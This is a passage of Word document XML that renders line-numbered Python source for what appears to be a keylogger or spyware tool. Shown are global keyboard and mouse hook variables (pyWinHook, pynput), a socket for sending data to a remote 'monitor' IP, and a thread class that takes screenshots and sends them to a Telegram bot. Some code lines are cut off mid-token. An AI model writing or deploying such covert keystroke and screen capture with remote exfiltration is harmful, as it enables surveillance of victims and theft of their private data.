      </w:r>
      <w:bookmarkEnd w:id="466"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="467" w:name="l120"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">120  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="467"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># TCP Server control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="468" w:name="l121"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">121  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="468"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">server_has_client </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= False                       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Client connected ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="469" w:name="l122"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">122  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="469"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">client_thread </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= None                            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># This is a thread object of Client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="470" w:name="l123"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">123  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="470"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= None                                   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Server object instance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="471" w:name="l124"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">124  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="471"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="472" w:name="l125"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">125  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="472"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Send to Monitor control variables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="473" w:name="l126"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">126  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="473"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">monitor_soc </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= None                              </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Socket that controls communication to monitor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="474" w:name="l127"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">127  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="474"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">monitor_enable_send </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= False                     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Enabled? It could be avoided by checking only if the socket exists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="475" w:name="l128"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">128  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="475"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">monitor_ip </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= None                               </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Destination IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="476" w:name="l129"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">129  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="476"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">monitor_port </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">DEFAULT_MONITOR_PORT             </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Destination PORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="477" w:name="l130"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">130  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="477"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="478" w:name="l131"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">131  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="478"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">hm </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= None               </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Global Mouse and Keyboard Hook for pyWinHook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="479" w:name="l132"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">132  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="479"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">key_previous </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= None     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Previous key, used in pynput</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="480" w:name="l133"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">133  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="480"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="481" w:name="l134"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">134  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="481"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="482" w:name="l135"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">135  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="482"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="483" w:name="l136"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">136  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="483"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># CLASSES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="484" w:name="l137"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">137  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="484"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="485" w:name="l138"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">138  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="485"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="486" w:name="l139"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">139  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="486"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Threading class to capture screenshot and send to remote services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="487" w:name="l140"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">140  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="487"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">class </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>ScreenShoo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8" w:name="l141"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">141  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="488"/>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screen_file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9" w:name="l142"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">142  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="489"/>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490" w:name="l143"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">143  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="49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reen_filename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="491" w:name="l144"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">144  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="491"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="492" w:name="l145"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">145  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="492"/>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93" w:name="l146"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">146  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="49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Guardado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4" w:name="l147"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">147  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="494"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>mss</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>mss</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>sct</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">:                      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Take a screenshot using MSS module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="495" w:name="l148"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">148  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="49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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>shot</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>mon</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>output</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s2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6" w:name="l149"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">149  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="49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Fin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7" w:name="l150"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">150  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="497"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>telegram_bot_image</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 xml:space="preserve">)        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Send screenshot to Telegram bot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="498" w:name="l151"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">151  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="498"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="499" w:name="l152"/>
